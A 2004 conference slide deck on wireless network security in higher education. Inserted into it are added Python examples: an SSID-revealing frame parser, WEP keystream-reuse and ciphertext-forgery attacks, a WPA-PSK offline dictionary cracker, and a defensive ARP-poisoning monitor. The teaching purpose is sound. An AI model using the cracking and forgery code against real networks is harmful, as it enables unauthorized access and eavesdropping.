Effective Practices in Wireless Security for Higher Ed
H. Morrow Long, CISSP, CISM
Director - Information Security
Yale University
EDUCAUSE 2004 Annual Conference
Wednesday Oct 20, 2004, 2:15p-3:05p - Track 3 Session
Meeting Room 605 - Denver Colorado Convention Center
Effective Practices Working Group


Copyright Notice

Copyright H. Morrow Long 2004. This work is the intellectual property of the author. Permission is granted for this material to be shared for non-commercial, educational purposes, provided that this copyright statement appears on the reproduced materials and notice is given that the copying is by permission of the author. To disseminate otherwise or to republish requires written permission from the author.


The Problem?

[Four screenshots in the original slide; nothing recoverable from the extracted text.]

Yahoo! Map of Yale

[Map image in the original slide.]

Yale Central & Science Campus Wireless Map

http://www.wifimaps.com/

[Map image from wifimaps.com in the original slide.]

Yale Medical Campus Wireless Map

http://www.intel.com/ca/personal/do_more/wireless/stories/bondar.htm

With more than 50 speaking engagements a year throughout North America and a career as a photographer that takes her around the world, Bondar, who was chosen to participate in the prestigious Women of Influence speakers series, carries her notebook PC, equipped with Intel® Centrino™ mobile technology+, everywhere she goes. On a recent visit to Yale University in Connecticut, Bondar says, "I used it on hospital rounds with neurosurgery residents." This is not your father's notebook, distinguished solely by portability. The built-in wireless technology allows unprecedented freedom.+ Among its attributes are mobility, of course, enhanced by a thin profile and lightweight components, longer battery life and uncompromised performance. A user within range of a wireless local area network (WLAN), or hotspot, has immediate high-speed access to the Internet and e-mail and can download or send text, data and graphics with ease. "Even five years ago," says Bondar, "wireless technology would have made a huge difference to my life."


WLAN Network Security Terminology Definitions

• VPN
• Supranet
• Internet
• internet
• intranet
• extranet
• ISP
• Firewall
• WEP
• SSL / TLS
• Access Point
• NAT Router
• Bridge
• Encryption
• Authentication
• PKI
• LDAP
• "Certificate"

Wireless Data – Terminology Definition

• IEEE 802.11a
• IEEE 802.11b
• IEEE 802.1X
• IEEE 802.11e
• IEEE 802.11g
• IEEE 802.11i
• Bluetooth
• HomeRF
• Jini
• EAP
• LEAP
• PEAP
• EAP over TLS
• TTLS
• WiFi
• WPA

802.11 Wireless Standards

802.11 (1997) – 1 to 2 megabits/second.

802.11b – From 1 up to 11 megabits/second.

• Shares the 2.4 GHz band with Bluetooth (and microwave ovens, cordless phones), so they interfere with each other.

802.11a – 5 GHz; supports data rates of 6, 9, 12, 18, 24, 36, 48 and 54 Mbps.

802.11e – multimedia & QoS improvements; it is not a security amendment.

802.11g – up to 54 Mbps in the 2.4 GHz band (22 Mbps was a pre-standard vendor "b+" rate), backward compatible with 802.11b.

802.1X – Authentication & port-based access control for all 802 LANs (wired and wireless).

WPA – 802.1X + EAP + TKIP + MIC; the WiFi Alliance's interim profile of the 802.11i draft.

802.11i – WPA plus AES-CCMP (Advanced Encryption Standard); certified by the WiFi Alliance as WPA2.

802.11 Generic MAC layer - IBSS

IBSS (Independent Basic Service Set) – AKA "Ad-hoc" network. Stations associate directly with each other without an AP. No relaying, only direct (peer to peer) traffic.

802.11 Generic MAC layer - BSS

BSS (Basic Service Set) – AP plus stations. AKA "Infrastructure" network. Stations need the AP to communicate with each other and/or to relay packets out to the internet. The SSID may be broadcast via beacon frames. An "Association" request is sent by the client station to the AP; the handshake to set up the association may involve authentication. A "Disassociate" request may be sent at the end of a session (or not sent at all if the station shuts down or moves out of range).

802.11 Generic MAC layer - ESS

ESS (Extended Service Set) – Multiple APs (each with multiple stations) connected via a wireless or wired LAN. AKA extended "Infrastructure" network. ESS == set of BSSs connected via a distribution system (DS) and sharing one SSID. APs communicate among themselves. The entire WLAN is a single layer-2 (MAC) network, so stations can roam within the ESS with AP handoff.

802.11 PHY Specs

802.11 PHY    Max Data Rate   Frequency       Modulation
802.11        2 Mb/s          2.4 GHz & IR    FHSS / DSSS
802.11b       11 Mb/s         2.4 GHz         DSSS (CCK)
802.11g       54 Mb/s         2.4 GHz         OFDM (DSSS/CCK for the 802.11b rates)
Super-G       108 Mb/s        2.4 GHz         OFDM (Atheros proprietary channel bonding)
802.11a       54 Mb/s         5 GHz           OFDM

802.11b & 802.11g (WECA -> WiFi)

Most popular wireless LAN (WLAN).

11 separate channels in 2.4 GHz (the US/FCC allocation; 13 in most of Europe, 14 in Japan) – overlapping bands of frequencies, each about 22 MHz wide.

Channels 1, 6 and 11 are commonly used as this gives three non-overlapping channels.

802.11a

Less popular wireless LAN (WLAN).

8 non-overlapping channels in the 5 GHz frequency range (the original US indoor allocation). 5 GHz is not shared with 2.4 GHz b/g gear, so 802.11a and 802.11b/g radios do not interoperate.

Was the only 54 Mb/s WLAN until 802.11g, which delivers 54 Mb/s in the 2.4 GHz band while remaining compatible with existing 802.11b hardware, APs and channels.

Wireless Data Risks and Threats – What are we worried about?

Controlling Access to our Network – Preventing intruders and disallowing anonymous access. Identifying and authenticating "trusted" users and devices. Authorization and network access control.

Confidentiality – Preventing eavesdropping and decryption to ensure privacy.

Integrity – Preventing tampering and session hijacking.

Availability – Ensuring quality of service, preventing denial of service.

Wireless Security Problems

Default Passwords

Open Broadcast of SSIDs

No or weak encryption.

Lack of authentication.

Accidental & Malicious association w/rogue APs (M-I-T-M tampering possible).

Sniffing

Spoofing

Denial of Service (DoS) Attacks (dis-association floods, jamming)

Attacks from outside: Spammers & Worms

Default SSID (Service Set Identifier)

Cisco ‘tsunami’

Linksys APs ‘linksys’

Sent in beacon frames (and in probe responses, so a default SSID also fingerprints the vendor and its default admin password).

Wireless Security Problems

Network Attacks (Spoofing and Denial of Service (DoS) Attacks) – Layers 1 thru 3.

Layer 1: Malicious AP overpowering a valid AP.

Layer 2: Spanning Tree (802.1D) packet attacks; broadcasts causing loops in redundant LANs.

Layer 2: Attacks on EAP endpoints (spoofed start/logoff commands, bogus connect/failure messages).

Layer 3: ARP cache poisoning; sending spoofed unsolicited ARP replies to computers to have them divert packets.

SSID Security Guidelines

Change the SSID from the vendor default.

Do not set the SSID to a secret (e.g. a password in use elsewhere) nor to anything which provides information to outsiders (e.g. company name).

Configure AP settings to not broadcast the SSID in beacon frames. Caveat: this only defeats casual discovery. The SSID is still sent in the clear in probe requests/responses and in every association request, so anyone sniffing while a client joins learns it. Treat the SSID as public, never as an authentication factor.
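To make the caveat concrete, here is an added Python example (mine, not code from the original talk or from any tool it names). It hand-builds two 802.11 management frames, a "closed network" beacon carrying an empty SSID element and the client's association request, then parses the header, the fixed fields and the tagged information elements. The SSID, the Privacy capability bit (WEP/WPA required) and the presence of an RSN element are all readable from the air; the MAC addresses, SSID and frame contents are constructed for the demo.

```python
"""Added example (not from the original slides): SSID hiding is not secrecy.

Builds two constructed 802.11 management frames, a 'closed network' beacon
(empty SSID element) and the client's association request, then parses the
header, the fixed fields and the tagged information elements (IEs). The SSID,
the Privacy capability bit and the RSN (802.11i/WPA2) element are all sent in
the clear, so a sniffer learns them the moment a client joins.
MAC addresses, SSID and frame contents are made up for the demo.
"""
import struct

MGMT_HDR_LEN = 24        # FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2)
SUBTYPE_NAME = {0: "assoc-req", 4: "probe-req", 5: "probe-resp", 8: "beacon"}
FIXED_LEN = {"beacon": 12, "probe-resp": 12, "assoc-req": 4, "probe-req": 0}
TAG_SSID, TAG_RSN = 0, 48   # IE ids: SSID, RSN (802.11i/WPA2)
CAP_PRIVACY = 0x0010        # capability bit 4: encryption required


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt(subtype: int, da: bytes, sa: bytes, bssid: bytes, fixed: bytes, ies) -> bytes:
    """Hand-build a management frame (constructed test data; no FCS)."""
    fc = struct.pack("<H", subtype << 4)   # type 0 = management, bits 4-7 = subtype
    hdr = fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    return hdr + fixed + b"".join(bytes([tag, len(v)]) + v for tag, v in ies)


def parse_mgmt(frame: bytes):
    """Return the security-relevant fields of a management frame, or None."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    (fc,) = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in SUBTYPE_NAME:
        return None
    kind = SUBTYPE_NAME[subtype]
    privacy = None
    if kind != "probe-req":               # capability field follows timestamp+interval in beacons
        cap_off = MGMT_HDR_LEN + (10 if kind in ("beacon", "probe-resp") else 0)
        (cap,) = struct.unpack_from("<H", frame, cap_off)
        privacy = bool(cap & CAP_PRIVACY)
    ies, off = {}, MGMT_HDR_LEN + FIXED_LEN[kind]
    while off + 2 <= len(frame):          # walk tag/len/value IEs
        tag, ln = frame[off], frame[off + 1]
        if off + 2 + ln > len(frame):     # truncated IE: stop rather than over-read
            break
        ies[tag] = frame[off + 2:off + 2 + ln]
        off += 2 + ln
    ssid = ies.get(TAG_SSID)
    return {
        "kind": kind,
        "sa": mac_str(frame[10:16]),
        "bssid": mac_str(frame[16:22]),
        "ssid": ssid.decode("utf-8", "replace") if ssid else None,
        "hidden": ssid == b"",            # zero-length SSID = 'closed network' beacon
        "privacy": privacy,
        "rsn": TAG_RSN in ies,
    }


def ssids_per_bssid(frames):
    """What a passive sniffer learns: every SSID seen per BSSID, from any frame type."""
    seen = {}
    for f in frames:
        p = parse_mgmt(f)
        if p and p["ssid"]:
            seen.setdefault(p["bssid"], set()).add(p["ssid"])
    return seen


def sample_capture():
    """Constructed capture: hidden-SSID beacon, then a client joining."""
    ap, client = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    bcast = b"\xff" * 6
    rates = (1, b"\x82\x84\x8b\x96")                    # Supported Rates IE
    beacon = build_mgmt(8, bcast, ap, ap,
                        b"\x00" * 8 + struct.pack("<HH", 100, 0x0411),  # timestamp, interval, cap (ESS|Privacy)
                        [(TAG_SSID, b""), rates])
    assoc = build_mgmt(0, ap, client, ap,
                       struct.pack("<HH", 0x0411, 10),                 # cap, listen interval
                       [(TAG_SSID, b"campus-net"), rates])
    return [beacon, assoc]


if __name__ == "__main__":
    for f in sample_capture():
        print(parse_mgmt(f))
    print(ssids_per_bssid(sample_capture()))
```

The beacon parses with `hidden` set and no name; the association request from the client gives the name away, and `ssids_per_bssid` is the one-liner a war-driver's tool runs over a capture. The parser stops at a truncated element instead of reading past the frame, which is the check a real dissector must make on attacker-controlled IEs.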

WLAN Security Guidelines

Use WEP to deter casual eavesdropping & trespassing (it does no more than that; see the WEP flaws below).
Use a VLAN & private IP subnet range outside of the corporate intranet.
Firewall the WLAN from the corporate intranet.
Require and use VPNs from stations to enter the corporate intranet.

802.11b Wireless Security Flaws

• Confidentiality – Interception / drive-by snooping
  • WEP – Wired Equiv. Privacy (the built-in answer; flawed)
  • VPNs and app-level crypto (SSL/TLS, SSH)
• Integrity – Impersonation
  • ARP cache poisoning (spoofing wired/wireless)
  • Session hijacking
• Availability – Denial of service (DoS)
  • Easy to jam with broad-spectrum interference
  • Some protection against electric appliances, none against a deliberate jammer

802.11b Wireless Security Flaws

• Authentication
  • MAC/hardware address control
  • DHCP using registered MAC/HW addresses
  • Firewall plus VPN approach
  • Proprietary: Cisco Aironet 350, Cisco driver and RADIUS
  • Web-based authentication
• Authorization – Appropriate access control
  • Access point filters, NAT routers and firewalls
• Accounting – Public 802.11b ISPs! Credit cards.

802.11b Wireless Security Flaws

802.11b's WEP has been shown to be flawed by the UC Berkeley ISAAC group researchers:

http://www.isaac.cs.berkeley.edu/isaac/wep-faq.html

At least one public-domain program is now available on the Internet which sniffs WEP traffic and recovers the static key being used for encryption. The recovery is not brute force: WEP's 24-bit IV is sent in the clear, prepended to the key, and repeats quickly, so captured packets with "weak" IVs leak key bytes statistically (the Fluhrer-Mantin-Shamir attack), and any IV reuse hands the attacker keystream directly. Therefore WEP by itself is no longer considered secure for protecting 802.11b traffic.
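Two of the flaws behind that verdict, reproduced on a toy frame, as an added Python example (mine, not from the slides or from the ISAAC work): RC4 is implemented directly, WEP's per-packet key of IV || static key and its CRC-32 ICV are applied, and the code shows first that two frames under a reused IV leak each other's plaintext with no key at all, and second that the linear CRC lets an attacker rewrite chosen bytes of a ciphertext and patch the ICV so the receiver still accepts it. The key, IVs and messages are constructed.

```python
"""Added example (not from the original slides): two WEP flaws on a toy frame.

RC4 is implemented directly; WEP uses it with a per-packet key of
IV (24 bits, sent in the clear) || static key, and appends a CRC-32 ICV.
  Flaw 1: at most 2^24 IVs under one static key, so keystream repeats;
          XOR of two ciphertexts with the same IV is the XOR of the plaintexts.
  Flaw 2: CRC-32 is affine, so an attacker can flip chosen bits of the
          ciphertext and patch the ICV without knowing the key.
Key, IVs and messages are constructed for the demo.
"""
import zlib


def rc4_keystream(key: bytes, n: int) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                         # key scheduling (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):                           # output generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def wep_encrypt(static_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV || RC4_{IV||key}(plaintext || CRC32(plaintext))."""
    assert len(iv) == 3
    body = plaintext + crc32_le(plaintext)
    return iv + xor(body, rc4_keystream(iv + static_key, len(body)))


def wep_decrypt(static_key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok); this is all the receiver checks."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + static_key, len(ct)))
    pt, icv = body[:-4], body[-4:]
    return pt, icv == crc32_le(pt)


def recover_by_iv_reuse(frame_a: bytes, frame_b: bytes, known_plaintext_a: bytes) -> bytes:
    """Flaw 1: same IV + same key => same keystream. C_a ^ C_b = P_a ^ P_b,
    so a known P_a (a DHCP or ARP packet, say) yields P_b with no key at all."""
    assert frame_a[:3] == frame_b[:3], "demo needs an IV collision"
    n = len(known_plaintext_a)
    return xor(xor(frame_a[3:3 + n], frame_b[3:3 + n]), known_plaintext_a)


def bitflip_without_key(frame: bytes, offset: int, new_bytes: bytes, old_bytes: bytes) -> bytes:
    """Flaw 2: crc(P ^ D) = crc(P) ^ crc(D) ^ crc(zeros of the same length).
    Change plaintext bytes at `offset` from old_bytes to new_bytes and patch the
    encrypted ICV to match, touching only ciphertext."""
    iv, ct = frame[:3], frame[3:]
    plen = len(ct) - 4
    delta = bytearray(plen)
    delta[offset:offset + len(new_bytes)] = xor(old_bytes, new_bytes)
    icv_delta = xor(crc32_le(bytes(delta)), crc32_le(bytes(plen)))
    return iv + xor(ct, bytes(delta) + icv_delta)


def demo():
    key = bytes.fromhex("0102030405")            # 40-bit static key (constructed)
    iv = b"\x00\x00\x2a"                          # an IV the AP happens to reuse
    fa = wep_encrypt(key, iv, b"hello, world! ")
    fb = wep_encrypt(key, iv, b"attack at dawn")
    leaked = recover_by_iv_reuse(fa, fb, b"hello, world! ")

    order = wep_encrypt(key, b"\x00\x00\x2b", b"TRANSFER 0100 TO ACCT 42")
    forged = bitflip_without_key(order, 9, b"9999", b"0100")
    pt, icv_ok = wep_decrypt(key, forged)
    return leaked, pt, icv_ok


if __name__ == "__main__":
    print(demo())   # (b'attack at dawn', b'TRANSFER 9999 TO ACCT 42', True)
```

Neither attack needs the key, and neither is fixed by a longer key, which is why WPA replaced the CRC with a keyed MIC and derives a fresh per-packet key from a per-session temporal key instead of IV || static key.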

802.11b Wireless Security Flaws

802.11b access points and networks were demonstrated as vulnerable to ARP cache poisoning by Cigital, Inc. in September 2001.

• Wireless PCs can be impersonated and their traffic redirected.

• SSH and SSL sessions can be hijacked (man-in-the-middle); the protocols flag this with a host-key or certificate warning, but only if users refuse to click through it.

• Wired hosts can be impersonated and have their traffic redirected if the access point is bridged onto a wired LAN.

• Other wireless LANs attached to the same wired LAN are also susceptible to ARP cache poisoning.
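Detection is cheap because the poison is visible on the wire. The added Python example below (mine, not a tool from the talk) is a passive ARP monitor of the kind the survey's "anti-spoof" column refers to: it feeds tcpdump-style ARP lines through a tracker that keeps the IP-to-MAC bindings it sees and raises an alert for a protected address (gateway, VPN server) answered from the wrong MAC, for a known address suddenly answering from a new MAC, and for replies nobody asked for; separately it reports any MAC that has claimed several addresses. The addresses and log lines are constructed.

```python
"""Added example (not from the original slides): a passive ARP-poisoning monitor.

Feeds tcpdump-style ARP lines (constructed here; real ones come from
`tcpdump -n -i <iface> arp`) through a tracker that keeps the IP->MAC table
it observes and alerts on:
  * a reply for a protected IP (gateway, VPN server) from the wrong MAC,
  * a known IP suddenly answering from a new MAC,
  * replies nobody asked for (gratuitous/unsolicited, the classic poison),
and, separately, a single MAC that claims several IPs.
Addresses and log lines are made up.
"""
import re

ARP_REQUEST = re.compile(r"ARP, Request who-has (\d+(?:\.\d+){3}) tell (\d+(?:\.\d+){3})")
ARP_REPLY = re.compile(r"ARP, Reply (\d+(?:\.\d+){3}) is-at ([0-9A-Fa-f:]{17})")


class ArpMonitor:
    def __init__(self, protected):
        self.protected = {ip: mac.lower() for ip, mac in protected.items()}  # registered bindings
        self.table = {}        # ip -> mac as observed on the wire
        self.pending = set()   # ips with an outstanding request (a reply is expected)
        self.claims = {}       # mac -> set of ips it has answered for
        self.alerts = []

    def feed(self, line: str):
        """Process one tcpdump line; return an alert string or None."""
        m = ARP_REQUEST.search(line)
        if m:
            self.pending.add(m.group(1))
            return None
        m = ARP_REPLY.search(line)
        if not m:
            return None
        ip, mac = m.group(1), m.group(2).lower()
        self.claims.setdefault(mac, set()).add(ip)
        solicited = ip in self.pending
        self.pending.discard(ip)

        impersonation = ip in self.protected and mac != self.protected[ip]
        alert = None
        if impersonation:
            alert = f"gateway-impersonation {ip} claimed by {mac} (expected {self.protected[ip]})"
        elif ip in self.table and self.table[ip] != mac:
            alert = f"binding-change {ip}: {self.table[ip]} -> {mac}"
        elif not solicited:
            alert = f"unsolicited-reply {ip} is-at {mac}"
        if not impersonation:
            self.table[ip] = mac   # learn, but never let an impersonator overwrite a protected entry
        if alert:
            self.alerts.append(alert)
        return alert

    def suspicious_macs(self, min_ips: int = 2):
        """MACs answering for several IPs: the poisoner posing as many hosts at once."""
        return {mac: len(ips) for mac, ips in self.claims.items() if len(ips) >= min_ips}


def run_monitor(lines, protected) -> ArpMonitor:
    mon = ArpMonitor(protected)
    for line in lines.splitlines():
        mon.feed(line)
    return mon


# Constructed capture: a normal exchange, then 00:0c:29:de:ad:99 poisoning the cell.
SAMPLE_LINES = """\
12:00:01.000 ARP, Request who-has 10.0.0.1 tell 10.0.0.23, length 28
12:00:01.001 ARP, Reply 10.0.0.1 is-at 00:11:22:33:44:01, length 28
12:00:02.000 ARP, Request who-has 10.0.0.23 tell 10.0.0.1, length 28
12:00:02.001 ARP, Reply 10.0.0.23 is-at 00:0c:29:aa:bb:23, length 28
12:00:05.000 ARP, Reply 10.0.0.1 is-at 00:0c:29:de:ad:99, length 28
12:00:05.002 ARP, Reply 10.0.0.23 is-at 00:0c:29:de:ad:99, length 28
12:00:06.000 ARP, Reply 10.0.0.77 is-at 00:0c:29:de:ad:99, length 28
"""

if __name__ == "__main__":
    mon = run_monitor(SAMPLE_LINES, {"10.0.0.1": "00:11:22:33:44:01"})
    print("\n".join(mon.alerts))
    print(mon.suspicious_macs())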

802.11b Wireless Security Flaws

Denial of Service

802.11b bandwidth degrades as signal strength decreases (from 11 Mb/s down to 1 Mb/s in steps), and one slow station drags down the throughput of the whole cell.

802.11b's frequency band conflicts with Bluetooth, wireless microphones, microwave ovens, etc.

802.11b supports multiple channels – useful for noise/conflict avoidance, but not really useful for security (channel choice is obscurity, not secrecy).

Signal can be boosted at the PC end by adding an antenna.

Amplifying signal reception at the AP increases noise.

802.11b Wireless Security Flaws

Denial of Service

The recently announced CCA (Clear Channel Assessment) flaw/vulnerability in 802.11b: a station can be made to report the medium as permanently busy, silencing every DSSS device in range. See the CERT announcement and

http://www.computerworld.com/securitytopics/security/story/0,10801,93221p4,00.htm

802.11b + 802.1X Wireless Security Flaws

University of Maryland researchers Arbaugh and Mishra ("An Initial Security Analysis of the IEEE 802.1X Standard", 2002) found possible weaknesses in 802.1X over 802.11:

• Session hijacking – the AP authenticates the client but the client never authenticates the AP's 802.11 management frames, so a spoofed disassociate followed by MAC spoofing takes over the authorized port.

• Man in the Middle (MitM) attacks – the EAP-Success message is not authenticated, so an attacker can pose as the AP.

802.11b Confidentiality Solutions

WEP – To secure 802.11b using WEP (Wired Equivalent Privacy) you need to (most sites don't do these):

• Lock down MAC (physical Ethernet) addresses

• Set a network name (non-blank & non-guessable).

• Configure a static shared secret (or a set of up to four secrets).

• Change it frequently (every key change means touching every client).

• Purchase "64" or "128" bit cards & base units (really 40- or 104-bit keys plus the 24-bit IV; the longer key slows brute force but does nothing against the IV-based attacks).

Non-WEP – Use application-level cryptography (SSL/TLS, SSH, etc.)

• Use and/or require VPNs

802.11b Integrity Solutions: Best Practices

Network Access Control (protect against ARP cache poisoning):

Don't connect wireless access points directly to the wired network.

Put wireless access points outside the corporate firewall.

Firewall/filter/block WLANs.

Use NAT router / firewall wireless access points.

Use VLANs between wired and wireless networks.

Use separate wireless VLANs to segregate WLAN traffic (ARP only reaches a host's own broadcast domain).

802.11b Availability Solutions

Note that wireless networks are susceptible to DoS attacks and have very limited shared bandwidth. THEREFORE THEY ARE NOT SUITABLE REPLACEMENTS FOR A WIRED NETWORK when you need high reliability (e.g. real-time patient or animal-subject monitoring).

That said, they can be a useful part of a BCP / disaster recovery strategy (the Sept. 11, 2001 WTC cases) for Internet access in the event of a wired network failure.

Suitable shielding may protect internal 802.11b nets. Intentional jamming may prevent 802.11b use; put external shielding outside.

Don't use omni-directional antennas: directional antennas decrease the spread of signal and the area of reception, particularly on point-to-point links.

802.11b Authentication / Authorization / Accounting Solutions

Use of VPNs over wireless LANs – Virtual Private Networks (PPTP, L2TP, IPSEC) with username/password, hardware tokens or X.509 certificates.

Proprietary secure authentication enhancements:

• Cisco Aironet 350 enhances WEP with RADIUS user authentication instead of MAC address. Adds an unlimited number of WEP keys (vs. one – Apple – or four – Lucent).

Secure web-based authentication approaches (captive portal).

802.1X “Provides”

• Authentication (various EAP methods)

• Port-based access control

• NOT confidentiality (the data path still uses WEP)

• Can provide dynamic WEP key management

• (Cisco uses EAP to provide this)

802.11b + 802.1X “Fixes”

• Add a MAC (Message Authentication Code) to EAP and 802.11b management messages, so they cannot be forged

• Time-synchronize communications between the PC and APs (against replay)

WPA (WiFi Protected Access)

Forward compatible with the IEEE 802.11i draft standard (802.11i adds AES encryption).

EAP (Extensible Authentication Protocol)

TKIP (Temporal Key Integrity Protocol) – per-packet RC4 keys mixed from a 128-bit temporal key, replacing IV || static key

MIC (Message Integrity Check, "Michael") – a keyed check replacing WEP's linear CRC-32 ICV

802.1X (for authentication and dynamic key exchange)

WPA Operation

WPA provides a fresh TKIP encryption key to both PC and AP for each session, derived from the pairwise master key (PMK) in the 4-way handshake.

In the absence of an authentication server (e.g. a home or small office network) WPA uses Pre-Shared Key mode (a manually configured passphrase/key). Caveat: the PMK is derived only from the passphrase and the SSID, and the 4-way handshake can be captured passively, so a short or dictionary passphrase can be recovered offline. Use a long random passphrase, and prefer 802.1X in the enterprise.

Legacy operation (old gear): WPA was designed as a firmware upgrade for existing 802.11 radios.
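The PSK caveat, worked through in an added Python example (mine, not from the slides): it implements the standard WPA/802.11i derivations, PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes), PTK = PRF-512 over the two MAC addresses and nonces, KCK = PTK[0:16], and the EAPOL-Key MIC (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP, truncated to 16 bytes). A synthetic handshake message 2 is built from a passphrase, and then recovered by trying a wordlist against its MIC, which is all an attacker needs from a sniffed handshake. The SSID, MAC addresses, nonces, wordlist and the EAPOL fields that do not affect the MIC are constructed.

```python
"""Added example (not from the original slides): why a weak WPA-PSK
passphrase is recoverable offline.

Standard WPA/802.11i derivations:
  PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)
  PTK = PRF-512(PMK, "Pairwise key expansion", min/max(AA,SPA) || min/max(ANonce,SNonce))
  KCK = PTK[0:16]; EAPOL-Key MIC = HMAC(KCK, frame with MIC zeroed)[:16]
        (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 for WPA2/CCMP)
A synthetic 4-way-handshake message 2 is built from a passphrase, then the
passphrase is recovered by trying a wordlist against the captured MIC.
SSID, MACs, nonces, wordlist and the EAPOL fields that do not affect the MIC
are constructed for the demo.
"""
import hashlib
import hmac
import struct
from dataclasses import dataclass

# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    return b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                    for i in range(4))[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed."""
    digest = hashlib.md5 if version == 1 else hashlib.sha1    # 1 = WPA/TKIP, 2 = WPA2/CCMP
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def build_msg2(snonce: bytes, version: int) -> bytes:
    """Constructed 4-way-handshake message 2 (supplicant -> AP) with a zero MIC."""
    desc = b"\xfe" if version == 1 else b"\x02"                # WPA vs RSN key descriptor
    key_info = 0x0108 | version                                  # MIC | Pairwise | descriptor version
    body = desc + struct.pack(">HH", key_info, 32 if version == 1 else 16)
    body += (1).to_bytes(8, "big")                              # replay counter
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # SNonce, IV, RSC, ID
    body += b"\x00" * 16                                        # MIC placeholder
    body += struct.pack(">H", 0)                                # key data length (RSN IE omitted here)
    return struct.pack(">BBH", 1, 3, len(body)) + body          # EAPOL version 1, type 3 = Key


@dataclass
class Handshake:
    ssid: bytes
    aa: bytes        # authenticator (AP) MAC
    spa: bytes       # supplicant (client) MAC
    anonce: bytes
    snonce: bytes
    msg2: bytes      # EAPOL-Key frame as captured, MIC filled in
    version: int


def make_capture(passphrase, ssid, aa, spa, anonce, snonce, version) -> Handshake:
    """What a sniffer would see from a network using this passphrase."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    msg2 = build_msg2(snonce, version)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2, version) + msg2[MIC_OFFSET + 16:]
    return Handshake(ssid, aa, spa, anonce, snonce, msg2, version)


def crack_psk(cap: Handshake, wordlist):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per candidate, no traffic needed."""
    captured_mic = cap.msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, cap.ssid)
        kck = derive_ptk(pmk, cap.aa, cap.spa, cap.anonce, cap.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, cap.msg2, cap.version), captured_mic):
            return candidate
    return None


SSID = b"campus-net"
AA, SPA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
WORDLIST = ["password", "12345678", "wireless2004", "letmein1"]   # constructed wordlist


def demo():
    weak = crack_psk(make_capture("wireless2004", SSID, AA, SPA, ANONCE, SNONCE, 1), WORDLIST)
    strong = crack_psk(make_capture("kT9#vQ2p!xL7mZ4r", SSID, AA, SPA, ANONCE, SNONCE, 2), WORDLIST)
    return weak, strong


if __name__ == "__main__":
    print(demo())   # ('wireless2004', None)
```

The 4096-iteration PBKDF2 is the only thing slowing the attacker down, at a few thousand guesses per second per CPU; it is an argument for passphrase length, not for secrecy of the SSID, which is part of the salt and public anyway.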

Requirements for WPA

WPA AP w/TKIP & 802.1X

WPA client w/TKIP,802.1X & an EAP "supplicant" supporting the chosen auth method/server

Authentication server on the network (e.g. RADIUS) with a strong EAP method:

• EAP-TLS
• EAP-TTLS
• PEAP

(LEAP also works with WPA but is not a strong method; see its flaws below.)

Comparison of WEP & WPA

WEP    40-bit (or 104-bit) static keys, manually distributed; flawed or no authentication.

WPA    128-bit dynamic keys, automatically distributed, with per-user, per-session and per-packet keys; 802.1X and EAP authentication.

WPA2   WPA plus AES (Advanced Encryption Standard, CCMP mode). It is 802.11i compliant.

Proprietary Wireless Security

Lucent (Orinoco) – created the first such features:

1. "Closed network" – don't broadcast the SSID (i.e. turn off the SSID in AP 'beacon frames').

2. 128-bit WEP (WEP Plus: 40-bit -> 104-bit key)

Stretches a WEP key brute-force from days to 20 weeks

(but the other WEP flaws bring the time to near zero regardless of key length; WEPplus also avoids the "weak" IVs, which only helps if every client on the cell does it too).

Proprietary Wireless Security

CISCO (340/350/…) - features:

Dynamically Generated Short-lived (Broadcast) WEP keys

(in an early firmware release)


Non-Proprietary Wireless Security

MAC Address Filtering

